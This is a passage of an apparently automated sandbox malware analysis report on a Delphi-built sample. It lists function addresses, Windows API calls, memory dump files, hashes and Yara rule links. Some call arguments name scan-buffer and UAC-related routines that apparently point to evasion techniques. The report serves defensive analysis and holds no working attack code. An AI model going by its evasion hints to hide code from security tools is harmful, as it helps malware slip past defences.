                                                              • API ID: HandleModule$AddressLibraryProc$FreeLoadMemoryVirtualWrite
                                                              • String ID:
                                                              • API String ID: 3283153180-0
                                                              • Opcode ID: bd85bd89ca380081145391118e2c278bbe93d12e23870aed4cf5a1183082fb03
                                                              • Instruction ID: e17f84f32e0cd69a58b70d613c44507779445a2b0937006cdc1aaac55e2c3e7c
                                                              • Opcode Fuzzy Hash: bd85bd89ca380081145391118e2c278bbe93d12e23870aed4cf5a1183082fb03
                                                              • Instruction Fuzzy Hash: 0C115170A50304BFEF10FBA8C802A5E77A9DB46700F6048F4B60DEBA91DA349D10DB54
                                                              Function 02B8E6E8 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VariantCopy.OLEAUT32(00000000,00000000), ref: 02B8E709
                                                                • Part of subcall function 02B8E2EC: VariantClear.OLEAUT32(?), ref: 02B8E2FB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Variant$ClearCopy
                                                              • String ID:
                                                              • API String ID: 274517740-0
                                                              • Opcode ID: 17c611584ad7faeb75da1bdde0fef493f94f38fb8c05fe8df8bff5fb1dd233cb
                                                              • Instruction ID: 7bf1e3ded4864f61c59ca6fb385dc82c66579b4beab6ad006c9d07fb8418dab2
                                                              • Opcode Fuzzy Hash: 17c611584ad7faeb75da1bdde0fef493f94f38fb8c05fe8df8bff5fb1dd233cb
                                                              • Instruction Fuzzy Hash: 9211A138B0022097CB25BF28CDC466677EADF9575071494E6FA4E8B256EB30CC41CBA6
                                                              Function 02B8E384 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InitVariant
                                                              • String ID:
                                                              • API String ID: 1927566239-0
                                                              • Opcode ID: 725dba8cb5c154333cb87e7b6164a9ec58bdf03e4951308d089867005896803d
                                                              • Instruction ID: 7459cb3b45086b9843a14ecb74db08cf89c1c6687e534473154925d9846e5890
                                                              • Opcode Fuzzy Hash: 725dba8cb5c154333cb87e7b6164a9ec58bdf03e4951308d089867005896803d
                                                              • Instruction Fuzzy Hash: 45313E71A04209EFDB51EEA8C984AAE77E8EB0C304F5C45A5F90DD7250E734ED51CBA2
                                                              Function 02B96CF4 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CLSIDFromProgID.OLE32(00000000,?,00000000,02B96D41,?,?,?,00000000), ref: 02B96D21
                                                                • Part of subcall function 02B84C0C: SysFreeString.OLEAUT32(02B9E950), ref: 02B84C1A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeFromProgString
                                                              • String ID:
                                                              • API String ID: 4225568880-0
                                                              • Opcode ID: 6dbd5b4a5e2b5b0e51e709b875c5c551933ac6b32bfbbb77beffd082d38bf79c
                                                              • Instruction ID: a601ffd8b5705a7334021983f46006c7c67abda5e7a717a6fbe6ea5908073057
                                                              • Opcode Fuzzy Hash: 6dbd5b4a5e2b5b0e51e709b875c5c551933ac6b32bfbbb77beffd082d38bf79c
                                                              • Instruction Fuzzy Hash: DCE06D71604208BBEB05FBA5DC5196A7BFDEF49B50B5148F1F809D3650EA74AE00D960
                                                              Function 02B85814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(02B80000,?,00000105), ref: 02B85832
                                                                • Part of subcall function 02B85A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B80000,02BAD790), ref: 02B85A94
                                                                • Part of subcall function 02B85A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B80000,02BAD790), ref: 02B85AB2
                                                                • Part of subcall function 02B85A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B80000,02BAD790), ref: 02B85AD0
                                                                • Part of subcall function 02B85A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B85AEE
                                                                • Part of subcall function 02B85A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B85B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B85B37
                                                                • Part of subcall function 02B85A78: RegQueryValueExA.ADVAPI32(?,02B85CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B85B7D,?,80000001), ref: 02B85B55
                                                                • Part of subcall function 02B85A78: RegCloseKey.ADVAPI32(?,02B85B84,00000000,?,?,00000000,02B85B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B85B77
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Open$FileModuleNameQueryValue$Close
                                                              • String ID:
                                                              • API String ID: 2796650324-0
                                                              • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                              • Instruction ID: d01aebe5f3ee74a37beebc83f3a2725b4e35dbfb7d38b7a93b1a8557ac7caea0
                                                              • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                              • Instruction Fuzzy Hash: D6E06D71A002148BCB20EE5C88C0A5637D8AB08750F4105A5EC58DF34AD370E9508BD0
                                                              Function 02B87D9C Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02B87DB0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                              • Instruction ID: ac51af5718fc1c8488434e54017f3104e87ea24c93748124e9d84b7300d69ee8
                                                              • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                              • Instruction Fuzzy Hash: 76D05BB63081507AD220A95A5C44EF75BDCCBC9770F100679B66CC3180E7208C01C771
                                                              Function 02B84C24 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeString
                                                              • String ID:
                                                              • API String ID: 3341692771-0
                                                              • Opcode ID: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
                                                              • Instruction ID: bf73fa03db257a1aa0158afe27383b0d9b97acc24aab623a56ed7b980423f056
                                                              • Opcode Fuzzy Hash: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
                                                              • Instruction Fuzzy Hash: 93C012B261133547EB216A9C9CC075662DCDB052A5F1400E1D50CD7240E3609C00CB65
                                                              Function 02B87E3C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesA.KERNEL32(00000000,?,02BA2A49,ScanString,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,Initialize), ref: 02B87E47
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: d4a25932c1186a40cb6d5613e0fc1b23b5cf5f8b84d23e416c631f776c8215f9
                                                              • Instruction ID: 5d49e2497d2d98d416ca165942b691ad1d6fbc53eecc5d21f091d2c5875c8d97
                                                              • Opcode Fuzzy Hash: d4a25932c1186a40cb6d5613e0fc1b23b5cf5f8b84d23e416c631f776c8215f9
                                                              • Instruction Fuzzy Hash: F7C08CA62022090E5E60B2FC1CC069A42CE8B1423A3B01FE1E53CDA1CADB11D822B410
                                                              Function 02B87E18 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesA.KERNEL32(00000000,?,02B9F8CC,ScanString,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanString,02BE137C,02BAAFD8,UacScan,02BE137C,02BAAFD8,UacInitialize), ref: 02B87E23
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
                                                              • Instruction ID: b81785ac39ac348f7d99c46f66c62c6545129381dee0b438db767bf1dfaf5fd6
                                                              • Opcode Fuzzy Hash: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
                                                              • Instruction Fuzzy Hash: BCC08CA62022000B9A60B1FC0CC444A42CC8B0413E3B40FF5B53CCA2D2DB218812B410
                                                              Function 02BABB50 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • timeSetEvent.WINMM(00002710,00000000,02BABB44,00000000,00000001), ref: 02BABB60
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Eventtime
                                                              • String ID:
                                                              • API String ID: 2982266575-0
                                                              • Opcode ID: 5581899b360c0b2fa1bf38089f0f260130f075321db0f21791f8002c2abe3144
                                                              • Instruction ID: 715282e57a9da7592a63dde5486cb961699fab0960b2df505f1ce444621d609f
                                                              • Opcode Fuzzy Hash: 5581899b360c0b2fa1bf38089f0f260130f075321db0f21791f8002c2abe3144
                                                              • Instruction Fuzzy Hash: B1C092F17D63003EF62466A81CD2F63668DE704B04FA00492BB05EE2D1D5E248604A74
                                                              Function 02B84BE4 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02B84BEB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocString
                                                              • String ID:
                                                              • API String ID: 2525500382-0
                                                              • Opcode ID: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                              • Instruction ID: 7b8ab41805a3427d10d079dab91b88e961865c5635a094ee0180e5e3eeea658f
                                                              • Opcode Fuzzy Hash: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                              • Instruction Fuzzy Hash: 64B0923824820359EA5036610D00B7210AC8B50286F8400D19E2CC8080FB00C401C832
                                                              Function 02B84BFC Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SysFreeString.OLEAUT32(00000000), ref: 02B84C03
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeString
                                                              • String ID:
                                                              • API String ID: 3341692771-0
                                                              • Opcode ID: 4210c3dfb18652f6ec0b0b51d6fbd20cd1f444da7e88b25de82dc1dad3c2e2d3
                                                              • Instruction ID: 287df9d815f941eefba6d6cc723e51e4b6c241ad810f6534fc255af60c8a45cd
                                                              • Opcode Fuzzy Hash: 4210c3dfb18652f6ec0b0b51d6fbd20cd1f444da7e88b25de82dc1dad3c2e2d3
                                                              • Instruction Fuzzy Hash: 56A022AC0003030ACF0B3B2E800002A20BBBFE03003CAC0E8020C0A000CF3A8000EE30
                                                              Function 02B815CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02B81A03,?,02B82000), ref: 02B815E2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 2e4cb4b6c0ed46af09a0c25fc07f42822163f76d9c6c49259ef018cbed540c16
                                                              • Instruction ID: 57c5026d241bf3d611f125d77d24ea41958ac3ff2b670853cbdfab64455f21bc
                                                              • Opcode Fuzzy Hash: 2e4cb4b6c0ed46af09a0c25fc07f42822163f76d9c6c49259ef018cbed540c16
                                                              • Instruction Fuzzy Hash: FFF0E7F0B523004BEB85DF7999543856BE6E789384F1485B9E609DF298E77194128B10
                                                              Function 02B81682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02B82000), ref: 02B816A4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: a30b3dc5a3773f4adbfd84338ab007605d176a9a0c9a565d81af4ba797a2604b
                                                              • Instruction ID: e4d9663a327a22b40cec395272e1fac4fe0bad7d1e0b1fd9b1caa6fe5d5e81fb
                                                              • Opcode Fuzzy Hash: a30b3dc5a3773f4adbfd84338ab007605d176a9a0c9a565d81af4ba797a2604b
                                                              • Instruction Fuzzy Hash: FFF0B4B2B41795ABDB20AF5E9C81782BBA4FB00354F054579F98CAB340D7B0A811CFD4
                                                              Function 02B816E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02B81FE4), ref: 02B81704
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeVirtual
                                                              • String ID:
                                                              • API String ID: 1263568516-0
                                                              • Opcode ID: 61aa7f50624fcea4168b25860724eff9e2ba59ef9e2f2416c619c1348532b689
                                                              • Instruction ID: 2bad6eab8ab04fbb28b43f7469c63964cf9dcbdac5cb67d275f366816ee9fc15
                                                              • Opcode Fuzzy Hash: 61aa7f50624fcea4168b25860724eff9e2ba59ef9e2f2416c619c1348532b689
                                                              • Instruction Fuzzy Hash: 10E086B9311301AFD7106E7D5D407126BD8EB44654F1448B9F54DDB241D2A0E811CB60

                                                              Non-executed Functions

                                                              Function 02B9A95C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02B9ABE3,?,?,02B9AC75,00000000,02B9AD51), ref: 02B9A970
                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02B9A988
                                                              • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02B9A99A
                                                              • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02B9A9AC
                                                              • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02B9A9BE
